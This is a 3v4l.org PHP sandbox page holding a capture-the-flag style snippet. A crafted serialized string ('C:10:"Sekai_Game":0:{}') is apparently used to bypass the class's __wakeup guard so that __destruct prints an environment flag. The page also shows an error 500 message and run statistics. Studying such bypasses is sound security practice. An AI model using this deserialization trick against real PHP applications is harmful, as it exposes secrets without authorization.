3v4l.org

run code in 300+ PHP versions simultaneously
<?php class Sekai_Game{ public $start = True; public function __destruct(){ echo "__destruct\n"; if($this->start === True){ echo "Sekai Game Start Here is your flag ".getenv('FLAG'); } } public function __wakeup(){ echo "__wakeup\n"; $this->start=False; } } $data='C:10:"Sekai_Game":0:{}'; unserialize($data); ?>

This is an error 500

Value for `_results` contains invalid data `array`


preferences:
160.73 ms | 1886 KiB | 10 Q